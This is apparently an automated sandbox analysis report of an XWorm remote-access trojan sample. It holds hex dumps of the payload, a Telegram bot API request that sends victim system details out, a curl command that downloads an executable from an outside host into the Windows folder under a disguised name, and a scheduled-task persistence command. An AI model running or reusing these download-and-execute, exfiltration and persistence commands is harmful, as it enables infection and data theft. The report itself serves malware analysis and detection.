                                                                                                                2024-11-23 20:03:05 UTC435INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 21 db 40 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 2e 01 00 00 08 00 00 00 00 00 00 5e 4d 01 00 00 20 00 00 00 60 01 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 01 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
                                                                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL!@g.^M `@ @
                                                                                                                2024-11-23 20:03:05 UTC1369INData Raw: 00 00 30 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 80 01 00 00 02 00 00 00 36 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 4d 01 00 00 00 00 00 48 00 00 00 02 00 05 00 2c 68 00 00 e4 e4 00 00 01 00 00 00 26 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1e 02 28 18 00 00 0a 2a 1a 72 01 00 00 70 2a 1a 20 57 e4 52 01 2a 1e 02 28 19 00 00 0a 2a 1a 72 21 00 00 70 2a 1a 20 f0 df bf 01 2a a6 73 1a 00 00 0a 80 01 00 00 04 73 1b 00 00 0a 80 02 00 00 04 73 1c 00 00 0a 80 03 00 00 04 73 1d 00 00 0a 80 04 00 00 04 2a 1a 72 41 00 00 70 2a 1a 20 1c a9 05
                                                                                                                Data Ascii: 0@@.reloc6@B@MH,h&(*rp* WR*(*r!p* *ssss*rAp*
                                                                                                                2024-11-23 20:03:05 UTC1369INData Raw: 1a 20 2c e6 9c 04 2a 1a 72 92 2d 00 70 2a 1a 20 a7 84 2f 04 2a 1a 72 d4 2d 00 70 2a 1a 20 4c 85 da 03 2a 1a 72 16 2e 00 70 2a 1a 72 58 2e 00 70 2a 1a 20 d5 cb 81 05 2a 1a 72 9a 2e 00 70 2a 1a 20 15 cd bc 01 2a 1a 72 dc 2e 00 70 2a 1a 20 39 dd 86 01 2a 1a 72 1e 2f 00 70 2a 1a 72 60 2f 00 70 2a 1a 72 a2 2f 00 70 2a 1a 20 b3 4a de 00 2a 1a 72 e4 2f 00 70 2a ba 72 26 30 00 70 73 19 01 00 0a 80 2e 00 00 04 72 74 30 00 70 73 19 01 00 0a 80 2f 00 00 04 72 b6 30 00 70 73 19 01 00 0a 80 30 00 00 04 2a 2e 73 18 01 00 06 28 1a 01 00 0a 2a 1a 72 d8 30 00 70 2a 1a 20 0c 72 1c 03 2a 1a 72 1a 31 00 70 2a 36 7f 32 00 00 04 1f fd 28 1b 01 00 0a 2a 1a 72 5c 31 00 70 2a 1a 20 27 5e e3 03 2a 1a 72 9e 31 00 70 2a 3a 02 28 1d 01 00 0a 7d 33 00 00 04 2b 00 2a 3a 02 7b 34 00 00
                                                                                                                Data Ascii: ,*r-p* /*r-p* L*r.p*rX.p* *r.p* *r.p* 9*r/p*r`/p*r/p* J*r/p*r&0ps.rt0ps/r0ps0*.s(*r0p* r*r1p*62(*r\1p* '^*r1p*:(}3+*:{4
                                                                                                                2024-11-23 20:03:05 UTC1369INData Raw: 00 0a 80 0d 00 00 04 7e 0e 00 00 04 28 2c 01 00 06 28 2d 00 00 0a 28 2e 00 00 0a 80 0e 00 00 04 7e 0f 00 00 04 28 2c 01 00 06 28 2d 00 00 0a 80 0f 00 00 04 7e 12 00 00 04 28 2c 01 00 06 28 2d 00 00 0a 80 12 00 00 04 7e 13 00 00 04 28 2c 01 00 06 28 2d 00 00 0a 80 13 00 00 04 7e 14 00 00 04 28 2c 01 00 06 28 2d 00 00 0a 80 14 00 00 04 7e 15 00 00 04 28 2c 01 00 06 28 2d 00 00 0a 80 15 00 00 04 7e 16 00 00 04 28 2c 01 00 06 28 2d 00 00 0a 80 16 00 00 04 de 14 25 28 2f 00 00 0a 0d 16 28 30 00 00 0a 28 31 00 00 0a de 00 28 47 01 00 06 2d 06 16 28 30 00 00 0a 28 28 00 00 06 de 0f 25 28 2f 00 00 0a 13 04 28 31 00 00 0a de 00 7e 0e 00 00 04 72 04 05 00 70 7e 0f 00 00 04 28 32 00 00 0a 0a 06 73 33 00 00 0a 6f 34 00 00 0a 6f 35 00 00 0a 13 05 11 05 28 2d 00 00 0a
                                                                                                                Data Ascii: ~(,(-(.~(,(-~(,(-~(,(-~(,(-~(,(-~(,(-%(/(0(1(G-(0((%(/(1~rp~(2s3o4o5(-
                                                                                                                2024-11-23 20:03:05 UTC1369INData Raw: 00 00 06 a2 11 05 1f 13 09 a2 11 05 1f 14 72 44 07 00 70 a2 11 05 1f 15 28 5b 00 00 06 a2 11 05 1f 16 09 a2 11 05 1f 17 72 52 07 00 70 a2 11 05 1f 18 28 5d 00 00 06 a2 11 05 1f 19 09 a2 11 05 1f 1a 72 60 07 00 70 a2 11 05 1f 1b 7e 0c 00 00 04 a2 11 05 28 40 00 00 0a 0c 07 1c 8d 36 00 00 01 13 05 11 05 16 72 72 07 00 70 a2 11 05 17 7e 15 00 00 04 a2 11 05 18 72 ac 07 00 70 a2 11 05 19 7e 16 00 00 04 a2 11 05 1a 72 d8 07 00 70 a2 11 05 1b 08 a2 11 05 28 40 00 00 0a 6f 5c 00 00 0a 26 de 0a 07 2c 06 07 6f 5d 00 00 0a dc de 0f 25 28 2f 00 00 0a 13 04 28 31 00 00 0a de 00 2a 00 00 41 4c 00 00 00 00 00 00 00 00 00 00 1c 00 00 00 1c 00 00 00 0e 00 00 00 37 00 00 01 02 00 00 00 30 00 00 00 4e 01 00 00 7e 01 00 00 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 8a
                                                                                                                Data Ascii: rDp([rRp(]r`p~(@6rrp~rp~rp(@o\&,o]%(/(1*AL70N~
                                                                                                                2024-11-23 20:03:05 UTC1369INData Raw: 00 00 0a 80 1e 00 00 04 28 56 00 00 06 28 2d 00 00 0a 28 60 00 00 06 16 80 21 00 00 04 7e 18 00 00 04 7e 1a 00 00 04 16 7e 1a 00 00 04 8e b7 16 14 fe 06 5e 00 00 06 73 7a 00 00 0a 14 6f 7b 00 00 0a 26 14 fe 06 65 00 00 06 73 7c 00 00 0a 0b 07 14 73 6c 00 00 0a 20 10 27 00 00 20 98 3a 00 00 6f 6d 00 00 0a 73 6c 00 00 0a 20 10 27 00 00 20 98 3a 00 00 6f 6d 00 00 0a 73 7d 00 00 0a 80 1c 00 00 04 14 fe 06 63 00 00 06 73 7c 00 00 0a 14 17 17 73 7d 00 00 0a 80 1f 00 00 04 de 20 25 28 2f 00 00 0a 0c 16 80 17 00 00 04 28 31 00 00 0a de 0c 7e 1d 00 00 04 6f 7e 00 00 0a 26 dc 06 2a 41 34 00 00 00 00 00 00 00 00 00 00 0e 01 00 00 0e 01 00 00 14 00 00 00 37 00 00 01 02 00 00 00 00 00 00 00 22 01 00 00 22 01 00 00 0c 00 00 00 00 00 00 00 13 30 05 00 58 01 00 00 13 00
                                                                                                                Data Ascii: (V(-(`!~~~^szo{&es|sl ' :omsl ' :oms}cs|s} %(/(1~o~&*A47""0X
                                                                                                                2024-11-23 20:03:05 UTC1369INData Raw: 91 00 00 0a 6f 26 00 00 0a 72 dc 13 00 70 72 58 06 00 70 6f 7f 00 00 0a 72 e4 13 00 70 72 58 06 00 70 6f 7f 00 00 0a 72 f6 13 00 70 72 58 06 00 70 6f 7f 00 00 0a 0a de 30 07 72 92 13 00 70 6f 91 00 00 0a 6f 26 00 00 0a 0a de 1d de 1b 25 28 2f 00 00 0a 0c 72 a8 12 00 70 0a 28 31 00 00 0a de 07 28 31 00 00 0a de 00 06 2a 00 01 10 00 00 00 00 00 00 66 66 00 1b 37 00 00 01 1b 30 04 00 b9 00 00 00 1a 00 00 11 14 0c 28 08 00 00 06 6f 5a 00 00 0a 6f 9e 00 00 0a 8c 6b 00 00 01 28 9f 00 00 0a 28 a0 00 00 0a b9 0b 07 20 00 00 00 40 6a 31 32 07 6c 23 00 00 00 00 00 00 d0 41 5b 13 04 12 04 28 a1 00 00 0a 0c 08 1a 08 6f 95 00 00 0a 1a da 6f a2 00 00 0a 72 fe 13 00 70 28 2b 00 00 0a 0c 2b 39 07 20 00 00 10 00 6a 31 30 07 6c 23 00 00 00 00 00 00 30 41 5b 13 04 12 04 28
                                                                                                                Data Ascii: o&rprXporprXporprXpo0rpoo&%(/rp(1(1*ff70(oZok(( @j12l#A[(oorp(++9 j10l#0A[(
                                                                                                                2024-11-23 20:03:05 UTC1369INData Raw: 6f b6 00 00 0a 14 80 18 00 00 04 de 0e 25 28 2f 00 00 0a 0d 28 31 00 00 0a de 00 28 b7 00 00 0a 2a 00 00 01 34 00 00 00 00 07 00 12 19 00 0e 37 00 00 01 00 00 2e 00 12 40 00 0e 37 00 00 01 00 00 55 00 1c 71 00 0e 37 00 00 01 00 00 86 00 1c a2 00 0e 37 00 00 01 1b 30 02 00 29 00 00 00 00 00 00 00 7e 21 00 00 04 2c 13 7e 17 00 00 04 2c 0c 7e 20 00 00 04 17 d6 80 20 00 00 04 de 0c 28 2f 00 00 0a 28 31 00 00 0a de 00 2a 00 00 00 01 10 00 00 00 00 00 00 1c 1c 00 0c 37 00 00 01 1b 30 03 00 5d 00 00 00 1f 00 00 11 7e 17 00 00 04 2c 45 1b 8d 36 00 00 01 0b 07 16 72 1e 14 00 70 a2 07 17 7e 0a 00 00 04 a2 07 18 28 3c 01 00 06 a2 07 19 7e 0a 00 00 04 a2 07 1a 7e 40 00 00 04 a2 07 28 40 00 00 0a 28 60 00 00 06 17 80 21 00 00 04 28 b7 00 00 0a de 0e 25 28 2f 00 00 0a
                                                                                                                Data Ascii: o%(/(1(*47.@7Uq770)~!,~,~ (/(1*70]~,E6rp~(<~~@(@(`!(%(/
                                                                                                                2024-11-23 20:03:05 UTC1369INData Raw: 03 00 00 11 13 72 57 21 00 70 16 28 66 00 00 0a 16 40 a5 00 00 00 06 17 9a 06 18 9a 28 c4 00 00 0a 1b 8d 36 00 00 01 13 14 11 14 16 72 65 21 00 70 a2 11 14 17 7e 0a 00 00 04 a2 11 14 18 28 3f 01 00 06 a2 11 14 19 7e 0a 00 00 04 a2 11 14 1a 72 77 21 00 70 a2 11 14 28 40 00 00 0a 28 60 00 00 06 de 52 25 28 2f 00 00 0a 13 08 1b 8d 36 00 00 01 13 14 11 14 16 72 a5 21 00 70 a2 11 14 17 7e 0a 00 00 04 a2 11 14 18 28 3f 01 00 06 a2 11 14 19 7e 0a 00 00 04 a2 11 14 1a 11 08 6f c5 00 00 0a a2 11 14 28 40 00 00 0a 28 60 00 00 06 28 31 00 00 0a de 00 38 c5 02 00 00 11 13 72 b7 21 00 70 16 28 66 00 00 0a 16 33 0f 72 b7 21 00 70 28 60 00 00 06 38 a6 02 00 00 11 13 72 c1 21 00 70 16 28 66 00 00 0a 16 33 40 06 80 22 00 00 04 06 17 9a 28 42 01 00 06 2d 19 72 cf 21 00 70
                                                                                                                Data Ascii: rW!p(f@(6re!p~(?~rw!p(@(`R%(/6r!p~(?~o(@(`(18r!p(f3r!p(`8r!p(f3@"(B-r!p
                                                                                                                2024-11-23 20:03:05 UTC1369INData Raw: 11 08 a2 11 09 14 14 14 17 28 4e 00 00 0a 26 dd e2 03 00 00 38 96 03 00 00 07 14 72 92 13 00 70 16 8d 03 00 00 01 14 14 14 28 4b 00 00 0a 72 87 22 00 70 16 28 de 00 00 0a 39 9d 00 00 00 72 9f 22 00 70 7e 0a 00 00 04 28 2b 00 00 0a 28 3f 01 00 06 28 2b 00 00 0a 7e 0a 00 00 04 28 2b 00 00 0a 7e 22 00 00 04 18 9a 28 df 00 00 0a 28 ae 00 00 0a 28 2b 00 00 0a 7e 0a 00 00 04 28 2b 00 00 0a 07 14 72 79 22 00 70 18 8d 03 00 00 01 13 08 11 08 16 14 a2 11 08 17 17 8d 03 00 00 01 13 09 11 09 16 7e 22 00 00 04 18 9a 28 df 00 00 0a 8c 89 00 00 01 a2 11 09 a2 11 08 14 14 14 28 4b 00 00 0a 28 9b 00 00 0a 28 2d 00 00 0a 28 60 00 00 06 dd 20 03 00 00 38 d4 02 00 00 07 14 72 92 13 00 70 16 8d 03 00 00 01 14 14 14 28 4b 00 00 0a 72 b1 22 00 70 16 28 de 00 00 0a 2c 62 07 14
                                                                                                                Data Ascii: (N&8rp(Kr"p(9r"p~(+(?(+~(+~"(((+~(+ry"p~"((K((-(` 8rp(Kr"p(,b


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                1192.168.2.749704149.154.167.2204431456C:\Windows\StartMenuExperienceHost.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-11-23 20:03:15 UTC441OUTGET /botAAFa5s6Qc5oDxqbipfR5RrOfgeTLKQlipKI/sendMessage?chat_id=7856673158&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A66ED47A5B18832423BF5%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%209TXRTVEZ%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.6 HTTP/1.1
                                                                                                                Host: api.telegram.org
                                                                                                                Connection: Keep-Alive
                                                                                                                2024-11-23 20:03:15 UTC344INHTTP/1.1 404 Not Found
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Sat, 23 Nov 2024 20:03:15 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 55
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                2024-11-23 20:03:15 UTC55INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                                                                                                Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                                                                                                Statistics

                                                                                                                CPU Usage

                                                                                                                Click to jump to process

                                                                                                                Memory Usage

                                                                                                                Click to jump to process

                                                                                                                High Level Behavior Distribution

                                                                                                                Click to dive into process behavior distribution

                                                                                                                Behavior

                                                                                                                Click to jump to process

                                                                                                                System Behavior

                                                                                                                General

                                                                                                                Target ID:0
                                                                                                                Start time:15:03:02
                                                                                                                Start date:23/11/2024
                                                                                                                Path:C:\Users\user\Desktop\18sFhgSyVK.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:"C:\Users\user\Desktop\18sFhgSyVK.exe"
                                                                                                                Imagebase:0x7ff77c910000
                                                                                                                File size:89'088 bytes
                                                                                                                MD5 hash:4E0D7812ADEF8E43E4EAE77BF07DCC94
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:low
                                                                                                                Has exited:false

                                                                                                                General

                                                                                                                Target ID:1
                                                                                                                Start time:15:03:02
                                                                                                                Start date:23/11/2024
                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                Imagebase:0x7ff75da10000
                                                                                                                File size:862'208 bytes
                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:high
                                                                                                                Has exited:false

                                                                                                                General

                                                                                                                Target ID:2
                                                                                                                Start time:15:03:02
                                                                                                                Start date:23/11/2024
                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:C:\Windows\system32\cmd.exe /c curl https://r2.hypixel.cfd/svchost.exe -o C:\Windows\StartMenuExperienceHost.exe --silent
                                                                                                                Imagebase:0x7ff606a90000
                                                                                                                File size:289'792 bytes
                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:high
                                                                                                                Has exited:true

                                                                                                                General

                                                                                                                Target ID:4
                                                                                                                Start time:15:03:02
                                                                                                                Start date:23/11/2024
                                                                                                                Path:C:\Windows\System32\curl.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:curl https://r2.hypixel.cfd/svchost.exe -o C:\Windows\StartMenuExperienceHost.exe --silent
                                                                                                                Imagebase:0x7ff64a680000
                                                                                                                File size:530'944 bytes
                                                                                                                MD5 hash:EAC53DDAFB5CC9E780A7CC086CE7B2B1
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:moderate
                                                                                                                Has exited:true

                                                                                                                General

                                                                                                                Target ID:5
                                                                                                                Start time:15:03:04
                                                                                                                Start date:23/11/2024
                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:C:\Windows\System32\svchost.exe -k NetworkService -p
                                                                                                                Imagebase:0x7ff7b4ee0000
                                                                                                                File size:55'320 bytes
                                                                                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:false
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:high
                                                                                                                Has exited:true

                                                                                                                General

                                                                                                                Target ID:7
                                                                                                                Start time:15:03:04
                                                                                                                Start date:23/11/2024
                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                                                                                                                Imagebase:0x7ff7b4ee0000
                                                                                                                File size:55'320 bytes
                                                                                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:high
                                                                                                                Has exited:false

                                                                                                                General

                                                                                                                Target ID:8
                                                                                                                Start time:15:03:04
                                                                                                                Start date:23/11/2024
                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:C:\Windows\system32\svchost.exe -k UnistackSvcGroup
                                                                                                                Imagebase:0x7ff7b4ee0000
                                                                                                                File size:55'320 bytes
                                                                                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                Has elevated privileges:false
                                                                                                                Has administrator privileges:false
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:high
                                                                                                                Has exited:false

                                                                                                                General

                                                                                                                Target ID:9
                                                                                                                Start time:15:03:04
                                                                                                                Start date:23/11/2024
                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc
                                                                                                                Imagebase:0x7ff7b4ee0000
                                                                                                                File size:55'320 bytes
                                                                                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:false
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:high
                                                                                                                Has exited:false

                                                                                                                General

                                                                                                                Target ID:10
                                                                                                                Start time:15:03:05
                                                                                                                Start date:23/11/2024
                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:C:\Windows\system32\cmd.exe /c color b
                                                                                                                Imagebase:0x7ff606a90000
                                                                                                                File size:289'792 bytes
                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:high
                                                                                                                Has exited:true

                                                                                                                General

                                                                                                                Target ID:11
                                                                                                                Start time:15:03:05
                                                                                                                Start date:23/11/2024
                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:C:\Windows\system32\cmd.exe /c C:\Windows\StartMenuExperienceHost.exe
                                                                                                                Imagebase:0x7ff606a90000
                                                                                                                File size:289'792 bytes
                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:high
                                                                                                                Has exited:false

                                                                                                                General

                                                                                                                Target ID:12
                                                                                                                Start time:15:03:05
                                                                                                                Start date:23/11/2024
                                                                                                                Path:C:\Windows\StartMenuExperienceHost.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:C:\Windows\StartMenuExperienceHost.exe
                                                                                                                Imagebase:0xb30000
                                                                                                                File size:79'872 bytes
                                                                                                                MD5 hash:9D9D23A73F3B3F53E8581D8BB31953C4
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Yara matches:
                                                                                                                • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 0000000C.00000000.1274279217.0000000000B32000.00000002.00000001.01000000.00000005.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000C.00000000.1274279217.0000000000B32000.00000002.00000001.01000000.00000005.sdmp, Author: Joe Security
                                                                                                                • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 0000000C.00000000.1274279217.0000000000B32000.00000002.00000001.01000000.00000005.sdmp, Author: ditekSHen
                                                                                                                • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 0000000C.00000002.3720613599.0000000002E21000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000C.00000002.3720613599.0000000002E21000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 0000000C.00000002.3720613599.0000000002E89000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_TelegramRecon, Description: Yara detected Telegram Recon, Source: C:\Windows\StartMenuExperienceHost.exe, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Windows\StartMenuExperienceHost.exe, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Windows\StartMenuExperienceHost.exe, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: C:\Windows\StartMenuExperienceHost.exe, Author: Joe Security
                                                                                                                • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Windows\StartMenuExperienceHost.exe, Author: ditekSHen
                                                                                                                Antivirus matches:
                                                                                                                • Detection: 100%, Avira
                                                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                                                • Detection: 88%, ReversingLabs
                                                                                                                Reputation:low
                                                                                                                Has exited:false

                                                                                                                General

                                                                                                                Target ID:13
                                                                                                                Start time:15:03:08
                                                                                                                Start date:23/11/2024
                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:C:\Windows\system32\svchost.exe -k LocalService -s W32Time
                                                                                                                Imagebase:0x7ff7b4ee0000
                                                                                                                File size:55'320 bytes
                                                                                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:false
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:high
                                                                                                                Has exited:false

                                                                                                                General

                                                                                                                Target ID:14
                                                                                                                Start time:15:03:11
                                                                                                                Start date:23/11/2024
                                                                                                                Path:C:\Windows\System32\schtasks.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\user~1\AppData\Local\Temp\svchost.exe"
                                                                                                                Imagebase:0x7ff6d6990000
                                                                                                                File size:235'008 bytes
                                                                                                                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:high
                                                                                                                Has exited:true

                                                                                                                General

                                                                                                                Target ID:15
                                                                                                                Start time:15:03:11
                                                                                                                Start date:23/11/2024
                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                Imagebase:0x7ff75da10000
                                                                                                                File size:862'208 bytes
                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:true

                                                                                                                General

                                                                                                                Target ID:16
                                                                                                                Start time:15:03:12
                                                                                                                Start date:23/11/2024
                                                                                                                Path:C:\Users\user\AppData\Local\Temp\svchost.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:C:\Users\user~1\AppData\Local\Temp\svchost.exe
                                                                                                                Imagebase:0xd70000
                                                                                                                File size:79'872 bytes
                                                                                                                MD5 hash:9D9D23A73F3B3F53E8581D8BB31953C4
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Yara matches:
                                                                                                                • Rule: JoeSecurity_TelegramRecon, Description: Yara detected Telegram Recon, Source: C:\Users\user\AppData\Local\Temp\svchost.exe, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Local\Temp\svchost.exe, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\Temp\svchost.exe, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: C:\Users\user\AppData\Local\Temp\svchost.exe, Author: Joe Security
                                                                                                                • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\svchost.exe, Author: ditekSHen
                                                                                                                Antivirus matches:
                                                                                                                • Detection: 100%, Avira
                                                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                                                • Detection: 88%, ReversingLabs
                                                                                                                Has exited:true

                                                                                                                General

                                                                                                                Target ID:18
                                                                                                                Start time:15:03:21
                                                                                                                Start date:23/11/2024
                                                                                                                Path:C:\Users\user\AppData\Local\Temp\svchost.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:"C:\Users\user~1\AppData\Local\Temp\svchost.exe"
                                                                                                                Imagebase:0xd20000
                                                                                                                File size:79'872 bytes
                                                                                                                MD5 hash:9D9D23A73F3B3F53E8581D8BB31953C4
                                                                                                                Has elevated privileges:false
                                                                                                                Has administrator privileges:false
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:true

                                                                                                                General

                                                                                                                Target ID:19
                                                                                                                Start time:16:38:56
                                                                                                                Start date:23/11/2024
                                                                                                                Path:C:\Users\user\AppData\Local\Temp\svchost.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:"C:\Users\user~1\AppData\Local\Temp\svchost.exe"
                                                                                                                Imagebase:0x750000
                                                                                                                File size:79'872 bytes
                                                                                                                MD5 hash:9D9D23A73F3B3F53E8581D8BB31953C4
                                                                                                                Has elevated privileges:false
                                                                                                                Has administrator privileges:false
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:true

                                                                                                                General

                                                                                                                Target ID:20
                                                                                                                Start time:16:39:00
                                                                                                                Start date:23/11/2024
                                                                                                                Path:C:\Users\user\AppData\Local\Temp\svchost.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:C:\Users\user~1\AppData\Local\Temp\svchost.exe
                                                                                                                Imagebase:0x680000
                                                                                                                File size:79'872 bytes
